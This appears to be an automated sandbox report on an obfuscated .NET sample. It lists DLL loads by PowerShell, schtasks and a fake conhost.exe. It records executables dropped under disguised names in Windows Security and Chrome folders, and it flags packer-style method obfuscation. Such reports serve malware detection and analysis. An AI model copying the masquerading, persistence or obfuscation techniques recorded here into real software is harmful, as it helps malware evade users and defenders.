                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Recovery\conhost.exeSection loaded: mscoree.dll
                          Source: C:\Recovery\conhost.exeSection loaded: apphelp.dll
                          Source: C:\Recovery\conhost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Recovery\conhost.exeSection loaded: version.dll
                          Source: C:\Recovery\conhost.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Recovery\conhost.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Recovery\conhost.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Recovery\conhost.exeSection loaded: windows.storage.dll
                          Source: C:\Recovery\conhost.exeSection loaded: wldp.dll
                          Source: C:\Recovery\conhost.exeSection loaded: profapi.dll
                          Source: C:\Recovery\conhost.exeSection loaded: cryptsp.dll
                          Source: C:\Recovery\conhost.exeSection loaded: rsaenh.dll
                          Source: C:\Recovery\conhost.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exeJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\78fe9fe6f28b21Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDirectory created: C:\Program Files\Google\Chrome\Application\conhost.exeJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDirectory created: C:\Program Files\Google\Chrome\Application\088424020bedd6Jump to behavior
                          Source: 3XtEci4Mmo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: 3XtEci4Mmo.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                          Source: 3XtEci4Mmo.exeStatic file information: File size 3823616 > 1048576
                          Source: 3XtEci4Mmo.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x3a5000
                          Source: 3XtEci4Mmo.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                          Data Obfuscation

                          barindex
                          .NET source code contains method to dynamically call methods (often used by packers)
                          Source: 3XtEci4Mmo.exe, r8fuc6TFjfWnUBPl3d1.cs.Net Code: Type.GetTypeFromHandle(o94buaNBbcJMVaBCeQA.oaOpO9Bv3sX(16777425)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(o94buaNBbcJMVaBCeQA.oaOpO9Bv3sX(16777246)),Type.GetTypeFromHandle(o94buaNBbcJMVaBCeQA.oaOpO9Bv3sX(16777260))})
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeCode function: 0_2_00007FFD9BA47541 push eax; iretd 0_2_00007FFD9BA4754D
                          Source: 3XtEci4Mmo.exe, XDuT18ckg7mOHRs8nmK.csHigh entropy of concatenated method names: 'NREce5kXOc', 'cBqcYomYh8', 'OXlcSawN7A', 'KsmdhP5Ekkp8C9fRkrPx', 'vgP9Ts5EEVN91bPLlOjO', 'YBrlGh5Es8MLiiwtXODb', 'aeO7Wb5EudG2iEP8K3ZM', 'f9DcboHr3f', 'WsUcPfDnGf', 'l18cgoImaW'
                          Source: 3XtEci4Mmo.exe, oQ7OQAEYBpL0GFl2yPw.csHigh entropy of concatenated method names: '_25r', 'h65', 'TenEZOG3hZ', 'HdQEhjIMls', 'jUPEGnQP8L', 'AWD', 'd78', 'A6v', 'dqG', 'M96'
                          Source: 3XtEci4Mmo.exe, YAiAdZMUZPbpZFvmuMy.csHigh entropy of concatenated method names: 'Df9M4mAo5N', 'OKGMeNZfIP', 'ERWMY0Kh2H', 'uc9MSyYjAY', 'dSAMZBph2f', 'sq0MhssD7X', 'JLgMG2op6x', 'LMkMMnJCvI', 'sKO64d5x7K1N7PVETnFD', 'cTAOJZ5xBBD1Avxu7tFD'
                          Source: 3XtEci4Mmo.exe, YvJZXfOtrQea2ypiqfQ.csHigh entropy of concatenated method names: 'Wc7', 'k7S', '_37r', 'RAo5AFbhLkh', 'DUE5Vzo2IwB', 'yTZBZa5upiqmZdhD8OcJ', 'uGiQNS5uV15AOUWiIrW7', 'zokSM75uDDQM2qojQbKZ', 'br3L8l5uOQrk3cf13gTI', 'Ev35T55udmtcFPDrDpP4'
                          Source: 3XtEci4Mmo.exe, VGwHCrsuW2RRHXbaOqB.csHigh entropy of concatenated method names: 'JWgsEePEcU', 'xYDsbZ6EcF', 'VSrsP4Yjob', 'Y34', '_716', 'p32', 'Na8', 'X25', 'pT1', 'oJOsgV7k9O'
                          Source: 3XtEci4Mmo.exe, VfkQOxORNVgyn05CXI4.csHigh entropy of concatenated method names: 'UQ6Ob7EOmD', 'sSJOPp77v5', 'gSsZUV5uHL8lV9RhHkFo', 'RJO2J35uIp5dfEPv0qSh', 'Y4Z0XN5uW72QtnMfFF4d', 'elF4yj5umGHfCCR5Z2T5', 'sisOIfbl4w', 'cwaOW8RSU1', 'i7nOHylCof', 'bgiOmuFWPr'
                          Source: 3XtEci4Mmo.exe, oqigSRBMI41rmDyj8d4.csHigh entropy of concatenated method names: 'USBlVW5UEej64ZmibT5Q', 'N5XO2F5UudaFvN9BbL4A', 'rZYnrY5UkN0U5XQyWuOi', 'uP0KHE5Ubd0A0ZQJiWgF', 'eaqRWybywS', 'MHY1eP5U1j0tUufKkpim', 'dgicpc5Ugki2dCfo76my', 'Crb01U5ULAMUftkHPyQp', 'PgaKyO5U9qF1M3A5ujIo', 'nIpbCK5UJxrHM9lRQcrT'
                          Source: 3XtEci4Mmo.exe, ss5cMKwVjRcNSNgIPbh.csHigh entropy of concatenated method names: 'tWDwO8Lfcq', 'PnuwdxwYA3', 'kvgwcTG3XO', 'MndwAHplYR', 'k4lwyWK9Q9', 'TBEE5W54T6p0hC5YblCO', 'MusyNf54vTUrP2Ma8EnB', 'duvnZV542cVxpnaVLof0', 'EigPCH54x6j4761LptJV', 'ct4E0h54NEnO66MNj6Nr'
                          Source: 3XtEci4Mmo.exe, nKLxTTo7rNk4JG4JrZD.csHigh entropy of concatenated method names: 'Cj1', '_1Td', 'Cz6', 'ht3', 'WKAoF3iYUX', '_947', 'AdDoqGPANl', 's4qoR8WyhC', '_1f8', '_71D'
                          Source: 3XtEci4Mmo.exe, W51hF452rDbaEZ4TPAR.csHigh entropy of concatenated method names: 'io8', 'V29', 'j67', '_2Q4', 'pi9', 'lbh5A7FDbiZ', 'CYD5VZdZcft', 'UmwJSy5wjlv3S0s7KM6g', 'moS3yx5w86akUcaQrGNn', 'Tf2Dn35wsY2KnL1ouuJY'
                          Source: 3XtEci4Mmo.exe, pR1dknVrrool85tJX3w.csHigh entropy of concatenated method names: 'b0GVw3Gj1F', 'Yx7Vj44fRR', 'lQlV8oUgVk', 'XyfYR158tXlAGR1YOOQb', 'fht9d658XI6D8SrsrdmD', 'z34WBS58fqLBHpewN7lH', 'GWnnUq58KuqcjHYDsPWH', 'LgMVIDOUX7', 'yw4VWCpGk0', 'tYFpcS58AxWlJmchkRbL'
                          Source: 3XtEci4Mmo.exe, JXAsLR6ynDv5Iu1fJQh.csHigh entropy of concatenated method names: 'JI06K6LFCb', 'XitbeK5PTx1dsdtbVeDa', 'vLQdpL5PvC0Khr19g8Lr', 'eZmZ9o5P2YcZbCSiRsgL', 'Ls6ia95PxWK6JUr9O6Nd', '_53Y', 'd65', 'q3s5DnxbML0', 'Vxs5DIerwEG', 'GNZ5AuheQ7f'
                          Source: 3XtEci4Mmo.exe, Qga3URZT8x6WLrvx99Y.csHigh entropy of concatenated method names: 'QOJhffvGy4', 'gwrAVj52OVD1920AiCpY', 'grRhN852VOU715YAfNTQ', 'vEE2Mg52DJUgwr0EoHtX', 'CnR4Q652daxLSrY0fLqT', 'uETCLe52cmPHD9glESq4', 'CPX', 'h7V', 'G6s', '_2r8'
                          Source: 3XtEci4Mmo.exe, LubZ5VX8s0KvdnHBpHk.csHigh entropy of concatenated method names: 'zTTt7VhUTi', 'Fb48755L4c2DF8uRg9KD', 'uhcG955LU5DE2kSxFob4', 'qFfxBf5LiVHhk0JhS9w0', 'SDXts85Le5fCG0thuAjm', 'LyqXuH0U3Y', 'PgYXkt5ZUc', 'VXYXE2KgE7', 'H36Xb7yN17', 'aqhXPff4Wc'
                          Source: 3XtEci4Mmo.exe, rRyqPVVNPWM30jUSo2n.csHigh entropy of concatenated method names: 'gOcDoWIdUJ', 'DsCc1Z5sDs1GIAH6tW3S', 'K3wObo5sOAVvj56yMJTB', 'GAZJ9o5spy3Ot0NEH8BH', 'aIgKik5sV0Hc4OQJtSAI', 'HQfhgF5sy7mjbNyLXiMV', 'BC080p5scMPGbFZjQeGD', 'll3ARD5sA690E9ym60S2', 's7h4Wk5s6REqQpifYNPs', 'fGBDRWdVkt'
                          Source: 3XtEci4Mmo.exe, h8HI4Jymb1qecqTOHW7.csHigh entropy of concatenated method names: '_71a', 'd65', 'Gvv5DX6Qt3i', 'rp05DfopdfU', 'ux05AHyR8Al', 'Xun5DaxnNBd', 'KY1gKM5POEkKlBy9w3Rl', 'NLbHaS5PdsqOFHYl69s4', 'MxQQuT5PcXnXWmpgvjbm', 'oZoWFv5PA5OYLS43qS2h'
                          Source: 3XtEci4Mmo.exe, stiBkjoCCwm4lV09ZWp.csHigh entropy of concatenated method names: 'GpL0a8TVeG', 'V6e05kuNnj', 'Uou0pba701', 'DDo0VnnSex', 'Frr0D94Ccl', 'TNmrNk59pfn47fpmwkKf', 'qUtHkr59aGUhhCTZq1Si', 'it1THO595UqIsyQ0rSXG', 'Dpy1jt59Vfbsj1LddE3o', 'kdBlds59DsWSFFsUQ6vn'
                          Source: 3XtEci4Mmo.exe, Qq1ICpBWOq26h1c01tP.csHigh entropy of concatenated method names: 'vNq', 'O3Q', 'a43', 'V8g', 'g39', '_9By', 'h74', 'fl2', '_4L8', '_8e1'
                          Source: 3XtEci4Mmo.exe, VKySMr590d78Ew3pDGf.csHigh entropy of concatenated method names: 'n39', 'V29', '_4yb', '_2Q4', 'p93', 'TGL5ABa88Rq', 'CYD5VZdZcft', 'VDPqQn5woLhduqgDLVdx', 'UhSpgc5w0kdjYFUnqKEL', 'HRLbEX5wrRLfQpxO3GcX'
                          Source: 3XtEci4Mmo.exe, fD0mRsBvFudi30WfIC.csHigh entropy of concatenated method names: 'S3uEQJvYc', 'mRScXN5HTfa6SpJkD1Cb', 'Nv7ghn5HxTtcteHR1Lie', 'a1ATqU5HvyNCtXIjpR5f', 'Vy8pqO5H2H4T6eSG2jtI', 'MkF78iJRR', 'JGhQsACSb', 'MxSF21c2P', 'w1QqoIiBE', 'PDjRgQu8N'
                          Source: 3XtEci4Mmo.exe, o4RP71saBgOEoJQfAYq.csHigh entropy of concatenated method names: 'a4Q', '_6h5', '_4fY', '_32D', 'j7E', 'Lr9', '_7ik', '_9X3', 'g6m', '_633'
                          Source: 3XtEci4Mmo.exe, HeTWIOwoanWxYRVBJ0f.csHigh entropy of concatenated method names: 'NSLwru7yJO', 'WIiwBfjO4Z', 'GxZwliBsJo', 'QZLHIo5eARX1hyu3tUKp', 'GORZ9x5edn7AIkBGPGoQ', 'Iltlnx5ec4O3E8Egx7u7', 'qRxKNv5eyvVfKAKtiT0A', 'xxKGGk5e6pLnV70jnPpY', 'pmKm0f5eXUUgLqibQKOt'
                          Source: 3XtEci4Mmo.exe, dlHYibKG1C8oBEoTInU.csHigh entropy of concatenated method names: 'd5uKvxxLwA', 'fO1K2o9Jp0', 'VrRKT7An4f', 'OErKxTFhA2', 'ETbKNgVkwF', 'Cf1T7951EZgmgSCLKUfD', 'tuUbcu51uUUdHygWbm5L', 'fbjlYa51kRLZR7A72Qt7', 'Nnh63251bXWpfqVYXMQP', 'GEOqhT51PYQtupLb9Gnl'
                          Source: 3XtEci4Mmo.exe, HqnsyhVYhDWmIHtSi1I.csHigh entropy of concatenated method names: 'WVSVGWQieK', 'b3VJop58k6BDSaZrB2gd', 'advmBH58s163j0d7YBDK', 'bRaceP58ubRD3SqyFlM1', 'kcq6M558ErXroMJ6iQmB', 'nbOVZcTsPH', 'lKBkSK58mKmenEsjfDDJ', 'PenoFj58wBBggbukBBk0', 'sK11KM58WolRCtZde9AE', 'PgUOO458HdepPy8MagZw'
                          Source: 3XtEci4Mmo.exe, NstwfCKuk5H6PuZyE10.csHigh entropy of concatenated method names: 'j9l', 'zWyKE3gjuQ', 'YZMKbbiH5I', 'evvKPp9cYA', 'XWWKg00SGM', 'CwGKLvEWyX', 'U7bK1xSoD8', 'F5FfUo51qiQHNBkeUtyt', 'IyReUG51Qk3c4so1cdfo', 'wZJKJT51FxMXkoBoibqh'
                          Source: 3XtEci4Mmo.exe, UpJdVpz4L2dZH3HuVj.csHigh entropy of concatenated method names: 'eCQ552yegA', 'lN35VsnweB', 'rVa5DhaWvB', 'ti85Oa791I', 'SxP5dqlUf4', 'eUZ5cmO3gt', 'vpU5ym9EVn', 'Eckupw5mscXVuwL1ZtuK', 'o9ajFy5mu06sW2ctglN7', 'g3tWKu5mkED5py0QildO'
                          Source: 3XtEci4Mmo.exe, eGOpidDWGp4xEbq6LpE.csHigh entropy of concatenated method names: 'pZODmSohbp', 'lABDwMWuUN', 'i6gDjKIcr1', 'xgdD8M6EdC', 'kwgGZa5sQ6JF5Xb6s00Z', 'P2AdD15slkB9RqIyp8Tb', 'mVxyuW5s7EnA74pYwnHt', 'AWiaau5sFG6RjUcZB9eR', 'jaKgfW5sqJbijaLBSVNr', 'IvZTmQ5sRbXcbFgJCJAE'
                          Source: 3XtEci4Mmo.exe, sCaJt9pUQAyRWikPj10.csHigh entropy of concatenated method names: 'ubupNA0q3j', 'yGHpC3Yucc', 'Skupzf1OKy', 'PB9tUb5jLWK5UWDbX5PG', 'mGxrtk5j1bpqo697DQJi', 'R5GiiA5jPvfVdE2kFDo8', 'uOIQNA5jgd7PmycnD3gE', 'vVOVOH2Up5', 'Hy5UJV5jUQqeGFA3POSy', 'J5GSmF5jJiXZ7PsgTIOw'
                          Source: 3XtEci4Mmo.exe, LDxoP1VbEe3ov8KpZVy.csHigh entropy of concatenated method names: 'XaeVgJPJ2V', 'TwbVLyCBRg', 'xu6V1YEoc0', 'bcNV98nev7', 'E3KVJOnvUx', 'zdIV3TMqVv', 'IKwVUSQVBb', 'm1tVildC9F', 'T0aV42wTNI', 'nVJVeIpYHv'
                          Source: 3XtEci4Mmo.exe, rj7rdZ60nbJL8sDeTRq.csHigh entropy of concatenated method names: '_5t1', 'd65', 'wNA5DHJxsDP', 'Q1P5Dm5RH9n', 'GkP6BiKU5u', 'PpJ5Aksho4m', 'Xun5DaxnNBd', 'j7d0dU5PCsdRTIGCsu6c', 'eYX2QJ5Pzb4gLlqDVLa9', 'YPHUvi5gaRZse3h0V9Eh'
                          Source: 3XtEci4Mmo.exe, PKN9PVhsJB13y5BuQxg.csHigh entropy of concatenated method names: 'iHQhEdHef6', 'YGdhL6bkMY', 'FVAhJoc9mp', 'EgFh3jA1Tk', 'ev6hUpGDb5', 'VyahiobnI9', 'Ynjh4n1f6G', 'QrkheM9HGj', '_0023Nn', 'Dispose'
                          Source: 3XtEci4Mmo.exe, Ji9uCVsm3umZPfqpIEZ.csHigh entropy of concatenated method names: '_57l', '_9m5', 't8K', 'k49', 'p65', '_3B1', '_4Pp', '_3M7', '_7b3', 'fAL'
                          Source: 3XtEci4Mmo.exe, m4GL6Xp0tf6vL6bNURi.csHigh entropy of concatenated method names: 'Ej7pBSKI8L', 'I5qple0PcU', 'z8ri605w2gmRcv7EcHu3', 'a5oGWH5wMVvgkBArrE6h', 'skc7HR5wvDCJFam3oIoM', 'sO3wY75wTDJthqD0xxXd', 'qpqhxm5wxOTQRvSMMie7', 'Dtgp505wNDrkwtLU54Iq', 'PLCS345wCQNE8UGponam', 'hKtlgF5wzdi6pcqJTP5u'
                          Source: 3XtEci4Mmo.exe, TWg5L4j1Q9belZsMcrx.csHigh entropy of concatenated method names: 'eT1jJEVavH', 'bFQj3PXstR', 'ItRjUqySHf', 'FZyjirbsVQ', 'H20j4Kj458', 'SxVjewU5QB', '_4tg', 'wk8', '_59a', '_914'
                          Source: 3XtEci4Mmo.exe, rb9ArvbAexNZHofw021.csHigh entropy of concatenated method names: 'uShb6IYdiI', '_64r', '_69F', '_478', 'iqHbX8UjK8', '_4D8', 'sJibfqn51E', 'DSLbtBoSKX', '_4qr', 'dcibKJjj1X'
                          Source: 3XtEci4Mmo.exe, SbeA6rOeDeQJfX2QIy8.csHigh entropy of concatenated method names: 'jeXOxwpPrm', 'VlmONk4SpY', 'Fw35ZW5uL2asN4fJcyWc', 'doBBxY5uPQtRI8VWFNQM', 'cOxNDG5ugrHOGyi20dGx', 'kLrK7s5u1AgutKDt8lap', 'Cw1d5l6vK4', 'lsW9K95uUToGDD8ISfMR', 'jAHS1q5uJtdoo62pi3Aq', 'SRTarT5u3FHwPess9SLC'
                          Source: 3XtEci4Mmo.exe, brHKGOrRZuFBrRPAP49.csHigh entropy of concatenated method names: 'iHJr4fn5Ks', 'OHlrIvgdBc', 'tFerWNLu11', 'AYprHlyIus', 'CVMrm2hsva', 'JjVrwLfSPk', 'zpfrjUNe5I', 'GnIr87MC00', 'KLVrsCpqce', 'D2druDMUhc'
                          Source: 3XtEci4Mmo.exe, ljIJl85KNKg0uXqkOny.csHigh entropy of concatenated method names: 'Gd950Fh5V4', 'hXk5rGunPQ', 'kM25BDaZlR', 'tiMZMi5mURsW9EA3SdER', 'u2fWRa5mJ6SFvS7p0WXF', 'a6X5Xa5m3sOJjynPEONE', 'rgrXWw5miUtT2xuBWJDU', 'ub2uwC5m4GqonuNTtW8g', 'uoG4c85mel08yG3ZdI7u'
                          Source: 3XtEci4Mmo.exe, NDD5xTtU1v84q4QF8yW.csHigh entropy of concatenated method names: 'qX6t4M3Bpj', 'LOHteTAwpd', 'JjptYrRN92', 'yVVtS9KVJc', 'rfbtZUm62T', 'oiOBkZ51aaRgbbK0BmfR', 'C8WZAA5LCy8dsQcBB56a', 'NOoDZA5LzMUiVJIxFw5f', 'U5VgPq515IepBTdmMxcB', 'zFuwPm51pYQRg7KbDwla'
                          Source: 3XtEci4Mmo.exe, Y39TNB5H0FBcOapU0dj.csHigh entropy of concatenated method names: 'N2T', 'V29', 'o75', '_2Q4', 'K3B', 'aUT5A0aMKND', 'CYD5VZdZcft', 'leu1CS5mNRCXPO3WHMOw', 'aQKAv15mCLnMoUIfNEl0', 'tm7wOd5mzSFZeOuW4iFL'
                          Source: 3XtEci4Mmo.exe, V13rd7NUjstUZRJDksB.csHigh entropy of concatenated method names: 'vtu5dYuKvqF', 'PL65dSwaJRB', 'jti5dZ1XZeE', 'ApJ5dhErKr8', 'NW45dGb6RG1', 'T3L5dMM2yR1', 'pA45dv3rHyE', 'OgqCy6semB', 'Hk85d2ovF3T', 'gXf5dTKIuc4'
                          Source: 3XtEci4Mmo.exe, CSVlJtyUcINMqWIoH87.csHigh entropy of concatenated method names: 'IDV', 'd65', 'T2y5AwCTnqI', 'Xun5DaxnNBd', 'Im3y40AukC', 'ygCDTB5PqBGKprASfFo1', 'yEJ63i5PRIGsFsJGNlei', 'QC3IsU5PnEpnIEJxOv8w', 'zOmT2u5PIq724tiJnUjF', 'ge67Le5PWvem1PJLJSbR'
                          Source: 3XtEci4Mmo.exe, YeKnSFkRBUbJHF9LetR.csHigh entropy of concatenated method names: 'sQrE0UxZLW', 'Ylnu3S5ZSwRYhIf0DeA7', 'fI4lc65Zepf3n7b0UNTa', 'h53uD85ZYsCewKp8wsVB', 'XDpBKk5ZZfcNttDyfTBg', 'i5X', 'NcTkINBqh9', 'W93', 'L67', '_2PR'
                          Source: 3XtEci4Mmo.exe, fNfLaE0zI2qySFfaDvO.csHigh entropy of concatenated method names: '_26K', '_1U7', '_5gR', '_58D', 'H8v', 'WWlr55uimG', 'eRgrpsmHRd', 'gY2', 'rV4', '_28E'
                          Source: 3XtEci4Mmo.exe, gdtUikMCYNnWjPOelGL.csHigh entropy of concatenated method names: 'JtIvpIcbPm', 'r1PvVEpwdG', 'XMBZdP5xsssGYgmSug07', 'L7OxBw5xuFXmDCIQPmBH', 'rB7i2E5xj5Ywrk3s7FiN', 'qqp0gH5x8ZAhYkoNqAne', 'cyFBJo5xkUlAT9KYQ1oX', 'ED2Pbt5xEhiC2U5eurtK', 'x2cva6VslS', 'xOhfmG5xHgPVaWgmBI38'
                          Source: 3XtEci4Mmo.exe, b9X1yycvmlPoNq4YwTc.csHigh entropy of concatenated method names: '_5Z7', '_58k', '_4x4', 'bU6', '_3t4', 'a5C', 'JUA77K5E3fIYeQ9xW9yA', 'wTSJNa5EUUnCwkwDeJpk', 'i6wTrS5EiadY8sgHJZ8D', 'YspcT6g8qb'
                          Source: 3XtEci4Mmo.exe, i8vMTkjFk8BjGrWUruO.csHigh entropy of concatenated method names: 'RcmjRlSjKY', 'kkIjnw6sbe', 'M62', '_1Xu', 'LuR', '_4p3', 'HVh', 'UfTjIfaKFM', '_96S', '_9s5'
                          Source: 3XtEci4Mmo.exe, dU0gkHp8oTPK7gX8Jgd.csHigh entropy of concatenated method names: 'vmtp9b7bfh', 'evAbWK5j7W1D4E2YdAS7', 'sCo2fB5jBhoUhQMf35iX', 'jEyqt05jlfgmvxVQNeEC', 'Wu7nSH5jQLf32iLhJigs', 'cyjpuYOGdC', 'IoPpkQNjLu', 'yucpERd2ni', 'hVhpblWTSF', 'JhO7Ly5jXR54cIOtFD7t'
                          Source: 3XtEci4Mmo.exe, D0YXPv8VpTedp7SMeWN.csHigh entropy of concatenated method names: 'x6C8OpvtsB', 'PR48dXX7GQ', '_7Bm', 'gNe8cY4uKh', 'KY38AioQl0', 'FKM8yoOGb9', 'suw86mnxtE', 'jc1kxu5YEe7Nx7s0YBNh', 'xQQZdn5YbhlJHr9rc8WR', 'vjFSQc5YPb7lq48WrxDs'
                          Source: 3XtEci4Mmo.exe, yhAAX56icX6HAqMQgTg.csHigh entropy of concatenated method names: '_34V', 'y7u', 'Xxj5ALqbEVo', 'T4m6eJ9BId', 'gt1', 'QbHfxa5gkhSf7gu0n654', 'DTHQYr5gsFQexb3SN0IA', 'GvcxrS5gu2PBv9VKCxmW', 'XCSMxX5gEJnppU96r4VE', 'FtBOmE5gbRsdaqEUmE2A'
                          Source: 3XtEci4Mmo.exe, t7y0YlShpwpkKkfFWtc.csHigh entropy of concatenated method names: 'PROSMG42tX', 'i1ISvB2oUV', 'ooIS2gR6Du', 'NyLSTwpyYf', 'ubhSxU27BM', 'H6aSNrUkWg', 'TeGSCvTZVL', 'vQiSzNaoZ2', 'WwaZaABuTk', 'htpZ5UoSjS'
